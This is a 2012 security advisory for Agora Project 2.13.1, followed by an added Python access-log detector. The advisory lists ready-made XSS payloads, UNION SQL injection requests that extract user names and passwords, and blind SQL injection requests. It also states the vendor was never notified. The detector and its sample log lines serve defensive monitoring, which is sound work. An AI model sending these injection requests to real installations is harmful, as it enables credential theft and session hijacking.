###################################################################
Agora Project 2.13.1 Multiple Vulnerabilities
###################################################################

Release Date Bug.          15-06-2012
Vendor Notification Date.  Never
Product.                   Agora project
Affected versions.         2.13.1 and earlier
Type.                      Non-commercial
Attack Vector.             XSS, SQLi, BSQLi
Solution Status.           unpublished
CVE reference.             Not yet assigned
Download                   http://www.agora-project.net/divers/download.php
Demo                       http://www.agora-project.net/demo/

I. BACKGROUND

Agora-Project is an intuitive groupware under GPL (based on PHP/MySQL).
It contains many modules: File Manager (with versioning), Calendars (with
resource calendars), Task Manager, Bookmark manager, Contacts, News, Forum,
Instant Messaging, etc.

II. DESCRIPTION

The vulnerabilities are cross-site scripting (XSS), SQL injection (SQLi) and
blind SQL injection (BSQLi).

III. EXPLOITATION

XSS

192.168.0.1/module_utilisateurs/utilisateur.php?id_utilisateur"><script>alert('xss')</script>
192.168.0.1/module_agenda/evenement.php?id_evenement="><script>alert('xss')</script>
192.168.0.1/module_contact/contact.php?id_contact="><script>alert('xss')</script>
192.168.0.1/module_contact/index.php?id_dossier="><script>alert('xss')</script>
192.168.0.1/module_tache/index.php?id_dossier="><script>alert('xss')</script>
192.168.0.1/module_agenda/index.php?printmode="><script>alert('xss')</script>
192.168.0.1/module_lien/index.php?id_dossier="><script>alert('xss')</script>
192.168.0.1/module_forum/index.php?theme="><script>alert('xss')</script>
192.168.0.1/module_fichier/index.php?id_dossier="><script>alert('xss')</script>
192.168.0.1/module_tableau_bord/index.php?tdb_periode="><script>alert('xss')</script>

SQLi

Exploitation requires at minimum a visit to the "public" space.

192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select pass FROM gt_utilisateur WHERE 1 AND '1'='1

BSQLi

Exploitation requires at minimum a visit to the "public" space.

192.168.0.1/module_tache/tache.php?id_tache=1'+and+substring(@@version,1,1)='5
192.168.0.1/module_tache/tache.php?id_tache=1'+and+(select+1+from+gt_utilisateur+limit+0,1)='1
192.168.0.1/module_tache/tache.php?id_tache=1'+and+(select+substring(concat(1,pass),1,1)+from+gt_utilisateur+limit+0,1)='1
192.168.0.1/module_tache/tache.php?id_tache=1'+and+(select+substring(concat(1,nom),1,1)+from+gt_utilisateur+limit+0,1)='1
192.168.0.1/module_tache/tache.php?id_tache=1'and ascii(substring((SELECT nom from gt_utilisateur limit 0,1),1,1))>'0'>'0
192.168.0.1/module_tache/tache.php?id_tache=1'+and ascii(substring((SELECT nom from gt_utilisateur limit 0,1),1,1))='110
...

Discovered by. Chris Russell
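
Added example (not part of the original advisory and not Agora-Project code): a web access log check for requests to the module_* scripts whose advisory-named parameters carry non-integer values or markup/SQL syntax. Treating the id_* and theme values as integers is an assumption, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory. Treating the id_* and theme values as
# plain integers is an assumption of this example, not a fact from the page.
INT_PARAMS = {"id_utilisateur", "id_evenement", "id_contact",
              "id_dossier", "id_tache", "theme"}
DIGITS = re.compile(r"[0-9]*")
# Markup and SQL fragments of the kind seen in the advisory's requests.
SUSPICIOUS = re.compile(r"[<>\"']|\bunion\b|\bselect\b|substring\s*\(", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')


def inspect_request(target):
    """Return (parameter, reason) findings for one request target."""
    parts = urlsplit(target)
    if not parts.path.lstrip("/").startswith("module_"):
        return []
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in INT_PARAMS and not DIGITS.fullmatch(value):
            findings.append((name, "non-integer value"))
        elif SUSPICIOUS.search(name + " " + value):
            # Also catches payloads placed in the parameter name itself.
            findings.append((name[:20], "markup or SQL syntax"))
    return findings


def scan(lines):
    """Return (line number, parameter, reason) for each flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits += [(number, *f) for f in inspect_request(match.group(1))]
    return hits


# Constructed sample access-log lines (combined format, documentation addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Jun/2012:10:00:01 +0000] "GET /module_forum/index.php?theme=3 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [15/Jun/2012:10:00:05 +0000] "GET /module_forum/index.php?theme=1%27+and+1%3D2+union+select+nom HTTP/1.1" 200 4312',
    '198.51.100.9 - - [15/Jun/2012:10:00:09 +0000] "GET /module_agenda/index.php?printmode=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1" 200 6001',
    '198.51.100.7 - - [15/Jun/2012:10:00:12 +0000] "GET /module_tache/tache.php?id_tache=12 HTTP/1.1" 200 2890',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 response to a flagged request does not by itself show that the injection succeeded; it marks the request for review.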